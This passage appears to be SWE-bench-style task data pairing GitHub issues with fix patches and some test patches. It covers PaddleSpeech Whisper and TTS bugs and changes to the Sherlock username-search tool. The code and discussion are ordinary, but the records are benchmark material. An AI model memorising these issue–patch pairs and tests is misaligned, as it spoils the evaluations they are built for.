) 3160 /opt/conda/envs/python35-paddle120-env/lib/python3.7/site-packages/paddlenlp/transformers/tokenizer_utils.py in _decode(self, token_ids, skip_special_tokens, clean_up_tokenization_spaces, spaces_between_special_tokens, **kwargs) 1404 1405 filtered_tokens = self.convert_ids_to_tokens( -> 1406 token_ids, skip_special_tokens=skip_special_tokens) 1407 1408 # To avoid mixing byte-level and unicode for byte-level BPT /opt/conda/envs/python35-paddle120-env/lib/python3.7/site-packages/paddlenlp/transformers/tokenizer_utils.py in convert_ids_to_tokens(self, ids, skip_special_tokens) 837 tokens = [] 838 for index in ids: --> 839 index = int(index) 840 if skip_special_tokens and index in self.all_special_ids: 841 continue TypeError: int() argument must be a string, a bytes-like object or a number, not 'list' ``` **To Reproduce** ```py audio_file = 'audio.wav' whisper_executor = paddlespeech.cli.whisper.WhisperExecutor() result = whisper_executor( model='whisper', task='transcribe', size='medium', sample_rate=16000, config=None, # Set `config` and `ckpt_path` to None to use pretrained model. ckpt_path=None, audio_file=audio_file, language='ja', device=paddle.get_device()) ``` When this problem occurs, the audio being transcribed is fairly long (for example 100 s of audio; I manually changed the 50-second `self.max_len` limit). My unfounded guess is that it is related to audio length / GPU memory, but when GPU memory really runs out the CUDA runtime reports out-of-memory directly, so it does not quite feel like that either. **Environment (please complete the following information):** - **Baidu AIStudio V100 / A100** - OS: Ubuntu - GCC/G++ Version unknown - Python Version 3.7 - PaddlePaddle Version 2.4.0 - Model Version [whisper-large](https://paddlespeech.bj.bcebos.com/whisper/whisper_model_20221122/whisper-large-model.tar.gz) also occurs with medium and small - GPU/DRIVER Information Tesla V100-SXM2-32GB/460.32.03, also occurs on A100 - CUDA/CUDNN Version cuda-10.2/cuDNN Version-8.2 - TensorRT Version **Additional context** Add any other context about the problem here. @zxcd
The model currently cannot handle very long audio, and we do not recommend manually changing the self.max_len parameter. If the audio is too long, we recommend using a VAD tool to split it first.
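One possible way to follow that advice (an illustration, not an officially endorsed pipeline): split the long file on silence before transcribing each chunk. This sketch uses librosa's energy-based splitter as a stand-in for a real VAD; the filename and threshold are placeholders.

```python
import librosa
import soundfile as sf

y, sr = librosa.load("audio.wav", sr=16000)      # Whisper expects 16 kHz input
intervals = librosa.effects.split(y, top_db=30)  # non-silent (start, end) sample ranges
for i, (start, end) in enumerate(intervals):
    sf.write(f"chunk_{i}.wav", y[start:end], sr)  # transcribe each chunk separately
```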
2023-01-11T13:20:37
PaddlePaddle/PaddleSpeech
2,828
PaddlePaddle__PaddleSpeech-2828
[ "2827" ]
ad40dafa856b9c4539e7b9f82bad2d9ff8c317f4
diff --git a/paddlespeech/s2t/models/whisper/whipser.py b/paddlespeech/s2t/models/whisper/whipser.py --- a/paddlespeech/s2t/models/whisper/whipser.py +++ b/paddlespeech/s2t/models/whisper/whipser.py @@ -476,7 +476,7 @@ def transcribe( decode_options["fp16"] = False if decode_options.get( - "language", 'None') or decode_options.get("language", None) is None: + "language") == 'None' or decode_options.get("language", None) is None: if not model.is_multilingual: decode_options["language"] = "en" else:
[S2T] Whisper transcription cannot choose languages For support and discussions, please use our [Discourse forums](https://github.com/PaddlePaddle/DeepSpeech/discussions). If you've found a bug then please create an issue with the following information: **Describe the bug** Even if the user specifies a language, the program will still detect the language by itself. **To Reproduce** ```py import paddle from paddlespeech.cli.whisper import WhisperExecutor audio_file = 'path/to/test.wav' whisper_executor = WhisperExecutor() result = whisper_executor( model='whisper', task='transcribe', size='tiny', sample_rate=16000, config=None, # Set `config` and `ckpt_path` to None to use pretrained model. ckpt_path=None, audio_file=audio_file, language='fr', device=paddle.get_device()) ``` **Screenshots** ![image](https://user-images.githubusercontent.com/8279655/211976128-6bd4d272-4189-4a37-bbf6-08c23c090947.png)
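A tiny standalone demonstration of the condition bug the patch above fixes (`decode_options` stands in for the real options dict): the old check is truthy whenever a language IS specified, so auto-detection always runs.

```python
decode_options = {"language": "fr"}  # user explicitly asked for French

old = decode_options.get("language", 'None') or decode_options.get("language", None) is None
new = decode_options.get("language") == 'None' or decode_options.get("language", None) is None

print(bool(old), new)  # True False -> the old condition wrongly triggers auto-detection
```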
2023-01-12T04:31:00
PaddlePaddle/PaddleSpeech
3,606
PaddlePaddle__PaddleSpeech-3606
[ "3605" ]
1dc67f96e0d083adb291589cecb28c9181914a07
diff --git a/paddlespeech/server/engine/tts/online/onnx/tts_engine.py b/paddlespeech/server/engine/tts/online/onnx/tts_engine.py --- a/paddlespeech/server/engine/tts/online/onnx/tts_engine.py +++ b/paddlespeech/server/engine/tts/online/onnx/tts_engine.py @@ -154,7 +154,7 @@ def _init_from_path( self.voc_sess = get_sess(self.voc_ckpt, voc_sess_conf) logger.debug("Create voc sess successfully.") - with open(self.phones_dict, "r") as f: + with open(self.phones_dict, "r", encoding='utf-8') as f: phn_id = [line.strip().split() for line in f.readlines()] self.vocab_size = len(phn_id) logger.debug(f"vocab_size: {self.vocab_size}")
[TTS] Startup error on Windows For support and discussions, please use our [Discourse forums](https://github.com/PaddlePaddle/DeepSpeech/discussions). If you've found a bug then please create an issue with the following information: **Describe the bug** Starting the `online-onnx` engine on Windows raises an error **To Reproduce** Steps to reproduce the behavior: ``` # -*- coding: utf-8 -*- from paddlespeech.server.bin.paddlespeech_server import ServerExecutor server_executor = ServerExecutor() server_executor( config_file="./application.yaml", log_file="./paddlespeech.log") ``` ``` python main.py -X utf8 ``` **Expected behavior** ``` PS E:\temp_code\server> python main.py -X utf8 E:\environment\python\lib\site-packages\paddleaudio\_extension.py:141: UserWarning: paddleaudio C++ extension is not available. warnings.warn("paddleaudio C++ extension is not available.") [2023-11-22 10:10:19,579] [ INFO] - start to init the engine [2023-11-22 10:10:19,580] [ INFO] - tts : online-onnx engine. [2023-11-22 10:10:23,437] [ ERROR] - Failed to get model related files. [2023-11-22 10:10:23,437] [ ERROR] - Initialize TTS server engine Failed on device: cpu. Traceback (most recent call last): File "E:\environment\python\lib\site-packages\paddlespeech\server\engine\tts\online\onnx\tts_engine.py", line 235, in init self.executor._init_from_path( File "E:\environment\python\lib\site-packages\paddlespeech\server\engine\tts\online\onnx\tts_engine.py", line 158, in _init_from_path phn_id = [line.strip().split() for line in f.readlines()] UnicodeDecodeError: 'gbk' codec can't decode byte 0x8c in position 2088: illegal multibyte sequence During handling of the above exception, another exception occurred: Traceback (most recent call last): File "E:\temp_code\server\main.py", line 6, in <module> server_executor( File "E:\environment\python\lib\site-packages\paddlespeech\server\util.py", line 365, in _warpper return executor_func(self, *args, **kwargs) File "E:\environment\python\lib\site-packages\paddlespeech\server\bin\paddlespeech_server.py", line 116, in __call__ if self.init(config): File "E:\environment\python\lib\site-packages\paddlespeech\server\bin\paddlespeech_server.py", line 89, in init if not init_engine_pool(config): File "E:\environment\python\lib\site-packages\paddlespeech\server\engine\engine_pool.py", line 38, in init_engine_pool if not ENGINE_POOL[engine].init(config=config[engine_and_type]): File "E:\environment\python\lib\site-packages\paddlespeech\server\engine\tts\online\onnx\tts_engine.py", line 254, in init logger(e) TypeError: Logger.__call__() missing 1 required positional argument: 'msg' ``` **Screenshots** **Environment (please complete the following information):** - OS: Windows - GCC/G++ Version: none - Python Version 3.10 - PaddlePaddle Version: latest - Model Version: latest - GPU/DRIVER Information: none - CUDA/CUDNN Version: none - MKL Version: none - TensorRT Version: none **Additional context**
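The root cause in one line: on Windows, `open()` without an `encoding` argument falls back to the locale code page (GBK here), so reading a UTF-8 phones dictionary fails to decode. A minimal sketch of the fix the patch applies (the filename is a placeholder for `self.phones_dict`):

```python
# Explicit encoding makes the read portable across locales (the patched line).
with open("phone_id_map.txt", "r", encoding="utf-8") as f:
    phn_id = [line.strip().split() for line in f.readlines()]
```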
2023-11-22T02:21:53
sherlock-project/sherlock
49
sherlock-project__sherlock-49
[ "47" ]
f9d59270a31b66b205d4777f72f9adadf8acac0d
diff --git a/sherlock.py b/sherlock.py --- a/sherlock.py +++ b/sherlock.py @@ -90,7 +90,8 @@ def sherlock(username, verbose=False, tor=False, unique_tor=False): } # Load the data - with open("data.json", "r", encoding="utf-8") as raw: + data_file_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "data.json") + with open(data_file_path, "r", encoding="utf-8") as raw: data = json.load(raw) # Allow 1 thread for each external service, so `len(data)` threads total
Fails when invoking script from a different directory ``` $ python sherlock/sherlock.py user123 ."""-. / \ ____ _ _ _ | _..--'-. / ___|| |__ ___ _ __| | ___ ___| |__ >.`__.-""\;"` \___ \| '_ \ / _ \ '__| |/ _ \ / __| |/ / / /( ^\ ___) | | | | __/ | | | (_) | (__| < '-`) =|-. |____/|_| |_|\___|_| |_|\___/ \___|_|\_\ /`--.'--' \ .-. .'`-._ `.\ | J / / `--.| \__/ [*] Removing previous file: user123.txt [*] Checking username user123 on: Traceback (most recent call last): File "sherlock/sherlock.py", line 313, in <module> main() File "sherlock/sherlock.py", line 289, in main results = sherlock(username, verbose=args.verbose, tor=args.tor, unique_tor=args.unique_tor) File "sherlock/sherlock.py", line 93, in sherlock raw = open("data.json", "r", encoding="utf-8") FileNotFoundError: [Errno 2] No such file or directory: 'data.json' ```
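The traceback shows `data.json` being opened relative to the current working directory, so invoking the script from anywhere else fails. The patch above resolves the path relative to the script file instead; a standalone sketch of that pattern:

```python
import json
import os

# Locate data.json next to this script, independent of the caller's CWD.
data_file_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "data.json")
with open(data_file_path, "r", encoding="utf-8") as raw:
    data = json.load(raw)
```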
2018-12-31T05:53:45
sherlock-project/sherlock
77
sherlock-project__sherlock-77
[ "44" ]
992e22059a129c5d445689e8a598d7dde9c7f70c
diff --git a/sherlock.py b/sherlock.py --- a/sherlock.py +++ b/sherlock.py @@ -21,7 +21,7 @@ from torrequest import TorRequest module_name = "Sherlock: Find Usernames Across Social Networks" -__version__ = "2018.01.04" +__version__ = "0.1.0" amount=0 # TODO: fix tumblr
Version Number System I do not think that the version number system should use the date. There are multiple systems out there, but they are all flavors of major.minor.maintenance. This allows the version number to have some meaning to other people. https://github.com/sdushantha/sherlock/blob/e2c4dbf1ef69db80a9c6ebf591be874686e04301/sherlock.py#L20
I do understand your point, but what I was thinking of was that, since we are updating the code frequently, I don't think everyone is going to have the latest version on their computer. So, if we use the year.month.day format, users will get an idea of whether their version is outdated or not. If major.minor.maintenance is the standard and has more meaning to other people, I'm more than happy to change it. 😊 @hoadlck Can you delete your fork of this repo? I want to transfer the ownership of this repo to you. To do that, you first have to delete your fork. @sdushantha Uh... you are the owner of this repo. You cannot abandon your child! :) I am on break now, so I had some free time to contribute. But, on 2019-01-02, the daily grind starts up again, and I am unsure how much time I will have to dedicate to this. @hoadlck I'm not abandoning my child, I'm giving my child off to adoption :) It is too difficult for me to maintain this repo. So I really want to give it away. Wait, this is not the end of the conversation, right? I can still see https://github.com/TheYahya/sherlock/blob/508eb88724dbe20dedf07dc00527ad4f32c93a77/sherlock.py#L24 at the moment, yet the latest commit is already on `2019.01.03`. Maybe just have something that is regularly used, like `0.0.1`, etc. I think `semantic versioning` is more reasonable. It would be better to change it to that ☺️
2019-01-03T21:51:53
sherlock-project/sherlock
96
sherlock-project__sherlock-96
[ "95", "95" ]
0d857030939da206f9e6098241ff80d869ae80e8
diff --git a/sherlock.py b/sherlock.py --- a/sherlock.py +++ b/sherlock.py @@ -152,11 +152,11 @@ def sherlock(username, verbose=False, tor=False, unique_tor=False): url = net_info["url"].format(username) results_site["url_user"] = url - # If only the status_code is needed don't download the body - if net_info["errorType"] == 'status_code': - request_method = session.head - else: - request_method = session.get + request_method = session.get + if social_network != "GitHub": + # If only the status_code is needed don't download the body + if net_info["errorType"] == 'status_code': + request_method = session.head # This future starts running the request in a new thread, doesn't block the main thread future = request_method(url=url, headers=headers) @@ -380,4 +380,4 @@ def main(): ) if __name__ == "__main__": - main() + main() \ No newline at end of file
GitHub doesn't work I would like to say it's all in the title. GitHub accounts can't be found.
2019-01-05T17:47:48
sherlock-project/sherlock
109
sherlock-project__sherlock-109
[ "82" ]
7e5bac0cb8374030405e2138ff04f5a9525f2527
diff --git a/sherlock.py b/sherlock.py --- a/sherlock.py +++ b/sherlock.py @@ -13,11 +13,12 @@ import sys import platform import re -from argparse import ArgumentParser, RawDescriptionHelpFormatter -from concurrent.futures import ThreadPoolExecutor +from time import time import requests -from colorama import Back, Fore, Style, init +from argparse import ArgumentParser, RawDescriptionHelpFormatter +from concurrent.futures import ThreadPoolExecutor +from colorama import Fore, Style, init from requests_futures.sessions import FuturesSession from torrequest import TorRequest @@ -28,28 +29,78 @@ # TODO: fix tumblr +class ElapsedFuturesSession(FuturesSession): + """ + Extends FutureSession to add a response time metric to each request. + + This is taken (almost) directly from here: https://github.com/ross/requests-futures#working-in-the-background + """ + + def request(self, method, url, hooks={}, *args, **kwargs): + start = time() + + def timing(r, *args, **kwargs): + elapsed_sec = time() - start + r.elapsed = round(elapsed_sec * 1000) + + try: + if isinstance(hooks['response'], (list, tuple)): + # needs to be first so we don't time other hooks execution + hooks['response'].insert(0, timing) + else: + hooks['response'] = [timing, hooks['response']] + except KeyError: + hooks['response'] = timing + + return super(ElapsedFuturesSession, self).request(method, url, hooks=hooks, *args, **kwargs) + + def open_file(fname): return open(fname, "a") + def write_to_file(url, f): f.write(url + "\n") + def final_score(amount, f): f.write("Total: "+str(amount) + "\n") -def print_error(err, errstr, var, debug=False): + +def print_error(err, errstr, var, verbose=False): print(Style.BRIGHT + Fore.WHITE + "[" + Fore.RED + "-" + Fore.WHITE + "]" + Fore.RED + f" {errstr}" + - Fore.YELLOW + f" {err if debug else var}") + Fore.YELLOW + f" {err if verbose else var}") + + +def format_response_time(response_time, verbose): + return " [{} ms]".format(response_time) if verbose else "" + + +def print_found(social_network, url, response_time, verbose=False): + print((Style.BRIGHT + Fore.WHITE + "[" + + Fore.GREEN + "+" + + Fore.WHITE + "]" + + format_response_time(response_time, verbose) + + Fore.GREEN + " {}:").format(social_network), url) + + +def print_not_found(social_network, response_time, verbose=False): + print((Style.BRIGHT + Fore.WHITE + "[" + + Fore.RED + "-" + + Fore.WHITE + "]" + + format_response_time(response_time, verbose) + + Fore.GREEN + " {}:" + + Fore.YELLOW + " Not Found!").format(social_network)) def get_response(request_future, error_type, social_network, verbose=False): try: rsp = request_future.result() if rsp.status_code: - return rsp, error_type + return rsp, error_type, rsp.elapsed except requests.exceptions.HTTPError as errh: print_error(errh, "HTTP Error:", social_network, verbose) except requests.exceptions.ConnectionError as errc: @@ -58,7 +109,7 @@ def get_response(request_future, error_type, social_network, verbose=False): print_error(errt, "Timeout Error:", social_network, verbose) except requests.exceptions.RequestException as err: print_error(err, "Unknown error:", social_network, verbose) - return None, "" + return None, "", -1 def sherlock(username, site_data, verbose=False, tor=False, unique_tor=False): @@ -119,8 +170,8 @@ def sherlock(username, site_data, verbose=False, tor=False, unique_tor=False): underlying_request = TorRequest() underlying_session = underlying_request.session() - # Create multi-threaded session for all requests - session = FuturesSession(executor=executor, 
session=underlying_session) + # Create multi-threaded session for all requests. Use our custom FuturesSession that exposes response time + session = ElapsedFuturesSession(executor=executor, session=underlying_session) # Results from analysis of all sites results_total = {} @@ -193,10 +244,10 @@ def sherlock(username, site_data, verbose=False, tor=False, unique_tor=False): # Retrieve future and ensure it has finished future = net_info["request_future"] - r, error_type = get_response(request_future=future, - error_type=error_type, - social_network=social_network, - verbose=verbose) + r, error_type, response_time = get_response(request_future=future, + error_type=error_type, + social_network=social_network, + verbose=verbose) # Attempt to get request information try: @@ -212,59 +263,35 @@ def sherlock(username, site_data, verbose=False, tor=False, unique_tor=False): error = net_info.get("errorMsg") # Checks if the error message is in the HTML if not error in r.text: - - print((Style.BRIGHT + Fore.WHITE + "[" + - Fore.GREEN + "+" + - Fore.WHITE + "]" + - Fore.GREEN + " {}:").format(social_network), url) + print_found(social_network, url, response_time, verbose) write_to_file(url, f) exists = "yes" amount=amount+1 else: - print((Style.BRIGHT + Fore.WHITE + "[" + - Fore.RED + "-" + - Fore.WHITE + "]" + - Fore.GREEN + " {}:" + - Fore.YELLOW + " Not Found!").format(social_network)) + print_not_found(social_network, response_time, verbose) exists = "no" elif error_type == "status_code": # Checks if the status code of the response is 2XX if not r.status_code >= 300 or r.status_code < 200: - - print((Style.BRIGHT + Fore.WHITE + "[" + - Fore.GREEN + "+" + - Fore.WHITE + "]" + - Fore.GREEN + " {}:").format(social_network), url) + print_found(social_network, url, response_time, verbose) write_to_file(url, f) exists = "yes" amount=amount+1 else: - print((Style.BRIGHT + Fore.WHITE + "[" + - Fore.RED + "-" + - Fore.WHITE + "]" + - Fore.GREEN + " {}:" + - Fore.YELLOW + " Not Found!").format(social_network)) + print_not_found(social_network, response_time, verbose) exists = "no" elif error_type == "response_url": error = net_info.get("errorUrl") # Checks if the redirect url is the same as the one defined in data.json if not error in r.url: - - print((Style.BRIGHT + Fore.WHITE + "[" + - Fore.GREEN + "+" + - Fore.WHITE + "]" + - Fore.GREEN + " {}:").format(social_network), url) + print_found(social_network, url, response_time, verbose) write_to_file(url, f) exists = "yes" amount=amount+1 else: - print((Style.BRIGHT + Fore.WHITE + "[" + - Fore.RED + "-" + - Fore.WHITE + "]" + - Fore.GREEN + " {}:" + - Fore.YELLOW + " Not Found!").format(social_network)) + print_not_found(social_network, response_time, verbose) exists = "no" elif error_type == "": @@ -276,11 +303,12 @@ def sherlock(username, site_data, verbose=False, tor=False, unique_tor=False): exists = "error" # Save exists flag - results_site['exists'] = exists + results_site['exists'] = exists # Save results from request - results_site['http_status'] = http_status + results_site['http_status'] = http_status results_site['response_text'] = response_text + results_site['response_time_ms'] = response_time # Add this site's results into final dictionary with all of the other results. results_total[social_network] = results_site @@ -311,7 +339,7 @@ def main(): ) parser.add_argument("--verbose", "-v", "-d", "--debug", action="store_true", dest="verbose", default=False, - help="Display extra debugging information." 
+ help="Display extra debugging information and metrics." ) parser.add_argument("--quiet", "-q", action="store_false", dest="verbose", @@ -393,7 +421,8 @@ def main(): 'url_main', 'url_user', 'exists', - 'http_status' + 'http_status', + 'response_time_ms' ] ) for site in results: @@ -402,9 +431,11 @@ def main(): results[site]['url_main'], results[site]['url_user'], results[site]['exists'], - results[site]['http_status'] + results[site]['http_status'], + results[site]['response_time_ms'] ] ) + if __name__ == "__main__": main() \ No newline at end of file
Display response times in verbose mode ## Feature Request It would be nice to display the response time for each request. ### Why? - It would help us determine which sites cause the program to slow down. If a site is very slow and non-critical, we could remove it to speed up Sherlock. - The more metrics the merrier! Has very little overhead, so why not :) ### User Experience We would only display this information in verbose mode (`-v` flag). The information can be displayed in each output line as: ```txt [+] [78 ms] Quora: https://www.quora.com/profile/nareddyt ``` Furthermore, these response times can be exported in the CSV. ### Implementation Details We would just need to store the time reach request was created in the `net_info` or `results_site` dictionaries. Then when the request is done, we would note the end time. Note there is some math involved in calculating times. It's not a simple `end-start` because the `result` for each response is extracted in the order of requests (not as soon as a request finishes). This is something I still need to think about...
Sounds good. Maybe then we could sort the sites by their response time and check the fastest ones first. Sounds great @nareddyt 😊, Let me know if you going to give it a hand ☺️ Here is my initial prototype of this feature. I was able to make use of [requests-futures' built-in hooks API](https://github.com/ross/requests-futures#working-in-the-background) to compute the response times per request in a parallel fashion. This introduces very little overhead. ![image](https://user-images.githubusercontent.com/11142171/50747375-96749200-1201-11e9-9185-52e0e6838673.png) For now, I will keep this feature simple and only display the response times in the console / csv. We can work on more advanced uses of these metrics (like the suggestion by @Czechball) once this initial feature is merged. I'll send out a PR once I clean up my code and also thoroughly test it :)
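A condensed sketch of the prototype described above, using the requests-futures response-hook pattern that the merged `ElapsedFuturesSession` is built on (the URL is a placeholder):

```python
from time import time
from requests_futures.sessions import FuturesSession

session = FuturesSession()

def timed_get(url):
    start = time()
    def timing(r, *args, **kwargs):
        r.elapsed_ms = round((time() - start) * 1000)  # attach latency to the response
    return session.get(url, hooks={"response": timing})

future = timed_get("https://example.com")
print(future.result().elapsed_ms)  # response time in milliseconds
```

Because the hook runs inside the worker thread as soon as the response arrives, the measured time is not distorted by when the main thread happens to call `result()`.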
2019-01-07T17:19:28
sherlock-project/sherlock
135
sherlock-project__sherlock-135
[ "128" ]
fba27cd709d684c0f5a4f644c8db71a3de6b10cb
diff --git a/sherlock.py b/sherlock.py --- a/sherlock.py +++ b/sherlock.py @@ -208,13 +208,27 @@ def sherlock(username, site_data, verbose=False, tor=False, unique_tor=False, pr if net_info["errorType"] == 'status_code': request_method = session.head + if net_info["errorType"] == "response_url": + #Site forwards request to a different URL if username not + #found. Disallow the redirect so we can capture the + #http status from the original URL request. + allow_redirects = False + else: + #Allow whatever redirect that the site wants to do. + #The final result of the request will be what is available. + allow_redirects = True + # This future starts running the request in a new thread, doesn't block the main thread if proxy != None: proxies = {"http": proxy, "https": proxy} - future = request_method( - url=url, headers=headers, proxies=proxies) + future = request_method(url=url, headers=headers, + proxies=proxies, + allow_redirects=allow_redirects + ) else: - future = request_method(url=url, headers=headers) + future = request_method(url=url, headers=headers, + allow_redirects=allow_redirects + ) # Store future in data for access later net_info["request_future"] = future @@ -290,9 +304,13 @@ def sherlock(username, site_data, verbose=False, tor=False, unique_tor=False, pr exists = "no" elif error_type == "response_url": - error = net_info.get("errorUrl") - # Checks if the redirect url is the same as the one defined in data.json - if not error in r.url: + # For this detection method, we have turned off the redirect. + # So, there is no need to check the response URL: it will always + # match the request. Instead, we will ensure that the response + # code indicates that the request was successful (i.e. no 404, or + # forward to some odd redirect). + if (r.status_code >= 200) and (r.status_code < 300): + # print_found(social_network, url, response_time, verbose) write_to_file(url, f) exists = "yes"
diff --git a/tests/all.py b/tests/all.py --- a/tests/all.py +++ b/tests/all.py @@ -23,7 +23,7 @@ def test_detect_true(self): """ self.username_check(['jack'], ['Twitter'], exist_check=True) - #self.username_check(['dfox'], ['devRant'], exist_check=True) + self.username_check(['dfox'], ['devRant'], exist_check=True) self.username_check(['blue'], ['Pinterest'], exist_check=True) self.username_check(['kevin'], ['Instagram'], exist_check=True) self.username_check(['zuck'], ['Facebook'], exist_check=True) @@ -92,3 +92,51 @@ def test_detect_false_via_response_url(self): ) return + + +class SherlockSiteCoverageTests(SherlockBaseTest): + def test_coverage_false_via_response_url(self): + """Test Username Does Not Exist Site Coverage (Via Response URL). + + This test checks all sites with the "response URL" detection mechanism + to ensure that a Username that does not exist is reported that way. + + Keyword Arguments: + self -- This object. + + Return Value: + N/A. + Will trigger an assert if detection mechanism did not work as expected. + """ + + self.username_check(['noonewouldeverusethis7'], + ["Pinterest", "iMGSRC.RU", "Pastebin", + "WordPress", "devRant", "ImageShack", "MeetMe" + ], + exist_check=False + ) + + return + + def test_coverage_true_via_response_url(self): + """Test Username Does Exist Site Coverage (Via Response URL). + + This test checks all sites with the "response URL" detection mechanism + to ensure that a Username that does exist is reported that way. + + Keyword Arguments: + self -- This object. + + Return Value: + N/A. + Will trigger an assert if detection mechanism did not work as expected. + """ + + self.username_check(['blue'], + ["Pinterest", "iMGSRC.RU", "Pastebin", + "WordPress", "devRant", "ImageShack", "MeetMe" + ], + exist_check=True + ) + + return
devRant/iMGSRC.RU/ImageShack/MeetMe Not Detecting Users That Exist Noticed while running the tests that devRant is not working right. @TheYahya suggested during the review of #105 that we use the founders' usernames for tests (as they would be expected to never delete their accounts). But, when I tried to find the "dfox" username, it said that it did not exist. Yet, if I go to https://devrant.com/users/dfox, I can see his profile. Here is the example command that demonstrates the problem: ``` python -u sherlock.py dfox --site devRant --verbose ``` Looks like @sdushantha added this site originally.
This appears to be a problem with the sites that redirect an attempt to view a non-existing username to the main site. If you try to go to https://devrant.com/users/dfoxxxxxxxxx (a user name that does not exist), then we get a redirect to the https://devrant.com/ root of the site. Yet, the "response_url" checking algorithm is only looking for the configured error URL being included in the response: ```python elif error_type == "response_url": error = net_info.get("errorUrl") # Checks if the redirect url is the same as the one defined in data.json if not error in r.url: print_found(social_network, url, response_time, verbose) write_to_file(url, f) exists = "yes" amount = amount+1 else: print_not_found(social_network, response_time, verbose) exists = "no" ``` Since "https://devrant.com/" is in "https://devrant.com/users/dfox", it is marked as an unknown username. Pinterest (for example) has a response URL of "https://www.pinterest.com/?show_error=true". So this does not cause the problem, as there is no overlap between a good username and the error URL.
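The flaw described above in a few lines, using the devRant values (this is the pre-patch logic, not Sherlock's current code):

```python
error_url = "https://devrant.com/"              # configured errorUrl for the site
response_url = "https://devrant.com/users/dfox"  # final URL for an EXISTING user

exists = error_url not in response_url  # pre-patch substring check from the snippet above
print(exists)  # False -> an existing user is wrongly reported as not found
```

The patch sidesteps the substring comparison entirely: it disables redirects for "response_url" sites and checks the HTTP status code of the original request instead.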
2019-01-23T02:43:44
sherlock-project/sherlock
139
sherlock-project__sherlock-139
[ "131" ]
adab51e580080897c22ce19cbd0626da6341c11b
diff --git a/site_list.py b/site_list.py --- a/site_list.py +++ b/site_list.py @@ -7,6 +7,11 @@ with open("data.json", "r", encoding="utf-8") as data_file: data = json.load(data_file) +sorted_json_data = json.dumps(data, indent=2, sort_keys=True) + +with open("data.json", "w") as data_file: + data_file.write(sorted_json_data) + with open("sites.md", "w") as site_file: site_file.write(f'## List Of Supported Sites ({len(data)} Sites In Total!)\n')
Sites sorting It may be a good idea to sort the sites in sites.md and data.json alphabetically. When I'm looking for sites to add, I always have to Ctrl+F in this repo or just scroll through the file... Also when seeing the results, it's just chaos.
Yeah, I have the same struggle. It's good to sort them. A bit of an addition to this idea: how about adding an option to sort by alexa.com rank? It's great @ptalmeida, but I'm afraid that the additional time to fetch ranks would make it take too long. Maybe it should be incorporated into the json data file and updated, for example, with site_list.py.
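The core of the fix adopted in the patch above, shown standalone: round-trip `data.json` through `json.dumps` with `sort_keys=True` so the site entries stay in alphabetical order.

```python
import json

with open("data.json", "r", encoding="utf-8") as data_file:
    data = json.load(data_file)

with open("data.json", "w") as data_file:
    data_file.write(json.dumps(data, indent=2, sort_keys=True))  # keys now sorted
```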
2019-01-23T13:10:37
sherlock-project/sherlock
704
sherlock-project__sherlock-704
[ "610" ]
0f51e01686031e984749f84c8f377fdacdb579d4
diff --git a/sherlock/sherlock.py b/sherlock/sherlock.py --- a/sherlock/sherlock.py +++ b/sherlock/sherlock.py @@ -438,9 +438,6 @@ def main(): action="store_true", dest="verbose", default=False, help="Display extra debugging information and metrics." ) - parser.add_argument("--rank", "-r", - action="store_true", dest="rank", default=False, - help="Present websites ordered by their Alexa.com global rank in popularity.") parser.add_argument("--folderoutput", "-fo", dest="folderoutput", help="If using multiple usernames, the output of the results will be saved to this folder." ) @@ -557,15 +554,6 @@ def main(): f"Error: Desired sites not found: {', '.join(site_missing)}.") sys.exit(1) - if args.rank: - # Sort data by rank - site_dataCpy = dict(site_data) - ranked_sites = sorted(site_data, key=lambda k: ("rank" not in k, site_data[k].get("rank", sys.maxsize))) - site_data = {} - for site in ranked_sites: - site_data[site] = site_dataCpy.get(site) - - #Create notify object for query results. query_notify = QueryNotifyPrint(result=None, verbose=args.verbose, diff --git a/sherlock/sites.py b/sherlock/sites.py --- a/sherlock/sites.py +++ b/sherlock/sites.py @@ -11,9 +11,8 @@ class SiteInformation(): - def __init__(self, name, url_home, url_username_format, popularity_rank, - username_claimed, username_unclaimed, - information): + def __init__(self, name, url_home, url_username_format, username_claimed, + username_unclaimed, information): """Create Site Information Object. Contains information about a specific web site. @@ -32,10 +31,6 @@ def __init__(self, name, url_home, url_username_format, popularity_rank, usernames would show up under the "https://somesite.com/users/" area of the web site. - popularity_rank -- Integer indicating popularity of site. - In general, smaller numbers mean more - popular ("0" or None means ranking - information not available). username_claimed -- String containing username which is known to be claimed on web site. username_unclaimed -- String containing username which is known @@ -58,11 +53,6 @@ def __init__(self, name, url_home, url_username_format, popularity_rank, self.url_home = url_home self.url_username_format = url_username_format - if (popularity_rank is None) or (popularity_rank == 0): - #We do not know the popularity, so make site go to bottom of list. - popularity_rank = sys.maxsize - self.popularity_rank = popularity_rank - self.username_claimed = username_claimed self.username_unclaimed = username_unclaimed self.information = information @@ -118,22 +108,19 @@ def __init__(self, data_file_path=None): """ if data_file_path is None: - #Use internal default. - data_file_path = \ - os.path.join(os.path.dirname(os.path.realpath(__file__)), - "resources/data.json" - ) - - #Ensure that specified data file has correct extension. - if ".json" != data_file_path[-5:].lower(): + # The default data file is the live data.json which is in the GitHub repo. The reason why we are using + # this instead of the local one is so that the user has the most up to date data. This prevents + # users from creating issue about false positives which has already been fixed or having outdated data + data_file_path = "https://raw.githubusercontent.com/sherlock-project/sherlock/master/sherlock/resources/data.json" + + # Ensure that specified data file has correct extension. + if not data_file_path.lower().endswith(".json"): raise FileNotFoundError(f"Incorrect JSON file extension for " f"data file '{data_file_path}'." 
) - if ( ("http://" == data_file_path[:7].lower()) or - ("https://" == data_file_path[:8].lower()) - ): - #Reference is to a URL. + if "http://" == data_file_path[:7].lower() or "https://" == data_file_path[:8].lower(): + # Reference is to a URL. try: response = requests.get(url=data_file_path) except Exception as error: @@ -172,14 +159,11 @@ def __init__(self, data_file_path=None): #Add all of site information from the json file to internal site list. for site_name in site_data: try: - #If popularity unknown, make site be at bottom of list. - popularity_rank = site_data[site_name].get("rank", sys.maxsize) self.sites[site_name] = \ SiteInformation(site_name, site_data[site_name]["urlMain"], site_data[site_name]["url"], - popularity_rank, site_data[site_name]["username_claimed"], site_data[site_name]["username_unclaimed"], site_data[site_name] @@ -192,32 +176,17 @@ def __init__(self, data_file_path=None): return - def site_name_list(self, popularity_rank=False): + def site_name_list(self): """Get Site Name List. Keyword Arguments: self -- This object. - popularity_rank -- Boolean indicating if list should be sorted - by popularity rank. - Default value is False. - NOTE: List is sorted in ascending - alphabetical order is popularity rank - is not requested. Return Value: List of strings containing names of sites. """ - if popularity_rank: - #Sort in ascending popularity rank order. - site_rank_name = \ - sorted([(site.popularity_rank,site.name) for site in self], - 